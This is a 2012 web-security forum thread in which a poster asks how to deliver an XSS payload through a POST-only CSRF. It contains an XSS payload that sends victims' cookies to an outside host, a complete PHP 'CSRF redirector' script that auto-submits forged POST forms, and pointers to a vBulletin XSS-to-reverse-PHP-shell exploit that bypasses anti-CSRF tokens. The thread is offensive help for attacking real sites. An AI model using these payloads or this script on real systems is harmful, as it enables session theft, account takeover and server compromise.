.

CSRF with XSS payload encoding help

<<

eyenit0

User avatar

Jr. Member
Jr. Member

Posts: 52

Joined: Wed Sep 01, 2010 2:17 pm

Post Thu Aug 02, 2012 2:13 pm

CSRF with XSS payload encoding help

Hey everyone,

So, I've found an XSS vuln that I'd like to exploit via a CSRF vuln, but I'm having trouble with encoding in the CSRF.
Right now my CSRF exploit is just a hidden html form that's auto submitted by javascript. The XSS payload requires double quotes, which breaks the HTML form. For example, the value with the payload would look something like this:

value="<img src="#" onerror="javascript:document.location='http://site/?'+document.cookie">"

That obviously doesn't work because the quotes in the payload screw up the form. I can't URL encode the quotes because then they get double encoded and the payload won't execute. I've tried changing the enctype of the form to text/plain and multi-part/formdata but no luck. The CSRF vulnerable link will only take POST, not GET.

Any ideas on how to get around this? I was thinking it may be possible to dynamically construct an http POST request with Javascript to submit it, but I'm not sure how.

Any input is appreciated!
<<

unicityd

User avatar

Full Member
Full Member

Posts: 170

Joined: Wed Sep 03, 2008 5:33 pm

Post Thu Aug 02, 2012 2:19 pm

Re: CSRF with XSS payload encoding help

Will any of the URL shortening services accept it?
BS in IT, CISSP, MS in IS Management (in progress)
<<

eyenit0

User avatar

Jr. Member
Jr. Member

Posts: 52

Joined: Wed Sep 01, 2010 2:17 pm

Post Thu Aug 02, 2012 11:32 pm

Re: CSRF with XSS payload encoding help

Do any of those work with POST requests? I am not aware of any that handle those, but I'd love to hear of something like that if you know of one.
<<

unicityd

User avatar

Full Member
Full Member

Posts: 170

Joined: Wed Sep 03, 2008 5:33 pm

Post Fri Aug 03, 2012 2:50 am

Re: CSRF with XSS payload encoding help

No; they won't work with POST requests. There are other websites that will submit a POST for you though.

http://tomengineering.tripod.com/gettopost.html
http://get-to-post.nickj.org/
BS in IT, CISSP, MS in IS Management (in progress)
<<

ambient

User avatar

Newbie
Newbie

Posts: 20

Joined: Tue Feb 17, 2009 1:33 am

Location: Thailand

Post Wed Nov 07, 2012 2:57 am

Re: CSRF with XSS payload encoding help

You could implement it by CSRF redirector technique.
I have posted here but the source code is unavailable.

http://pornsookk.wordpress.com/2011/07/ ... edirector/

  Code:
<html>
<title>PHP CSRF Redirector</title>
<body>
<?php
/*   Call
 *   http://hackerhost.net/csrf_redirect.php?csrf=http://vulnerable.net?username=john|passwd=12345
 */
 $csrf   = $_GET['csrf'];
 $tokens = preg_split('/\?/',$csrf);
 $url    = $tokens[0];
 $vars   = preg_split('/\|/',$tokens[1]);
 print ('<form name="csrfForm" method="post" action="' . $url . '">');
 for($i=0;$i<sizeof($vars);$i++)
 {  /* $vars[$i]:  key=value;
     * key   = terms[0]
    * value = terms[1]  
     */
    $terms = explode('=',$vars[$i]);
   print('<input type="hidden" name="' . $terms[0] . '" value="' . $terms[1] . '" />');
 } //end for loop
 print("</form>");
?>
<script language="javascript" type="text/javascript">
  document.forms[0].submit();
</script>
</form>
</body>
</html>
Last edited by ambient on Wed Nov 07, 2012 4:40 am, edited 1 time in total.
<<

MaXe

User avatar

Hero Member
Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Wed Nov 07, 2012 3:49 am

Re: CSRF with XSS payload encoding help

Take a look at: www.intern0t.org/xssor/ for encoding methods.

Take a look at: http://www.exploit-db.com/vbseo-from-xs ... php-shell/ for a real world Proof of Concept (and former 0day).

The actual tool is available via: http://www.exploit-db.com/sploits/evilwebtool.tar.gz where trojan.js contains the javascript payload. (Note that the python tool reads php code or the reverse php shell (from pentestmonkey) and parses it into the trojan file before serving it.

It took some clever encoding, but it works 100% (tested in FireFox) and has been used in a few demo's that I've made. Knowing JavaScript, HTML and attack vectors within these, including various encoding methods, will be sufficient to pull off any XSS attack even defeating Anti-CSRF tokens.

The trojan.js file bypasses the built-in CSRF protection in vBulletin as well.  ;D It's probably the best PoC that I have ever made hehe
I'm an InterN0T'er

Return to Web Applications

Who is online

Users browsing this forum: No registered users and 0 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software